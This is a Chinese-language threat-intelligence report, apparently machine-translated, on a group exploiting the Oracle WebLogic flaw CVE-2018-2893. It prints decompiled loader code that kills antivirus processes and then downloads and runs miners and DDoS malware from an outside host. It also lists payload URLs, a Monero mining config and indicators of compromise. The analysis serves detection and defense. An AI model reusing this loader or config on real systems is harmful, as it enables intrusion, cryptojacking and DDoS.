黑客组织利用CVE-2018-2893漏洞开展恶意活动

7月18日,在官方发布的常规补丁更新中,Oracle固定CVE-2018-2893,Oracle WebLogic Server远程代码执行漏洞。三天后,在2018-07-21 11:24:31 GMT+ 8,我们注意到一个恶意的运动,我们已经跟踪了很长一段时间,开始利用这个漏洞传播自己。这项运动已经使luoxkexp[.]com作为主要C2,我们把它命名为luoxk。Luxk组在162017三月注册了luoxkexp[.]com,然后立即开始使用它。我们NSMON系统能够在第二天拾取这个C2域,并将其标记为异常。

从那时起,我们目睹了这个团体的各种活动,例如:

使用DSL(NITOL)代码进行DDoS攻击

使用GH0ST执行命令

使用XMRIG进行挖掘,钱包地址是48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH

Android恶意APK

蠕虫式RMI服务的开发

我们在僵尸网络追踪系统中捕获的最早的DDoS攻击从2017-06-11,受害者是116.211.167.112。

2017-06-11 22:39:29     dsl4            luoxkexp.com                    192.225.225.154 2015    ddos        tcp_flood     116.211.167.112                 15010       tcp_flood, target=116.211.167.112, port=15010, attack_time=20m, threads=30, type=22 

CVE-2018-2893 攻击载荷开发

第二十一日,luoxk组织开始瞄准CVE-2018-2893, 用了三天 开发了漏洞利用工具.

hxxp://103.99.115.220:8080/JexRemoteTools.jar      #md5 hash 2f7df3baefb1cdcd7e7de38cc964c9dc

通过反编译JAR包,我们将看到下面的关键代码。

public JexReverse(String paramString, int paramInt) throws Exception  

 {

   Properties localProperties = System.getProperties();

   String str = localProperties.getProperty("os.name");

   try

   {

     if (str.contains("Win"))

     {

       execw("taskkill /f /im 360Safe.exe");

       execw("taskkill /f /im 360tray.exe");

       downloadFile("hxxp://121.18.238.56:8080/aaa.exe", "59081.exe");

 

 

       execw("cmd /c 59081.exe");

       exec("59081.exe");

       throw new Exception("8888: windows执行下载者命令");  #windows execute downloader commands

     }

     downloadFile("hxxp://121.18.238.56:8080/testshell.sh", "gen.sh");

     execw("chmod 777 gen.sh");

     exec("/bin/sh gen.sh");

 

   }

   catch (Exception localException)

   {

 

     if (localException.toString().indexOf("8888") > -1) {

       throw localException;

     }

     throw new Exception("8888:" + new String(localException.toString()) + "rn");

   }

 }

下载地址注释

hxxp://121.18.238.56:8080/aaa.exe           #to download xmrig  

hxxp://121.18.238.56:8080/testshell.sh      #to download SYN_145, SYN_7008, a4.sh, a5.sh  

hxxp://121.18.238.56:8080/SYN_145           #BillGates ddos malware, C2=121.18.238.56:145  

hxxp://121.18.238.56:8080/a4.sh             #kill process using higher than 10% CPU  

hxxp://121.18.238.56:8080/SYN_7008          #BillGates ddos malware,  C2=121.18.238.56:7008  

hxxp://121.18.238.56:8080/a5.sh             #kill process using higher than 10% CPU, download and run xmrig  

hxxp://121.18.238.56/xmrig                  #xmrig, downloaded and ran by the above a5.sh  

hxxp://luoxkexp.com:8099/ver1.txt           #xmrig configureation, detailed as follows  

门罗币挖矿配置文件是上面的V1.1.TXT,如下:

ver=1.5;  

pool=pool.minexmr.com;  

port=5555;  

user=48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH+15000;  

pass=x;  

algo=cryptonight;  

durl=http://121.18.238.56:8080/aaa.exe;

C2访问趋势

luoxkexp[.]com的dns访问流量在过去几天一直在上升,达到300k / d以上的峰值

Ioc

121.18.238.56   AS4837 CHINA UNICOM China169 Backbone  

103.99.115.220  AS21859 Zenlayer Inc  

luoxkexp.com  

始发于微信公众号: 漏洞感知

本文由 华盟网 作者:一叶知秋 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论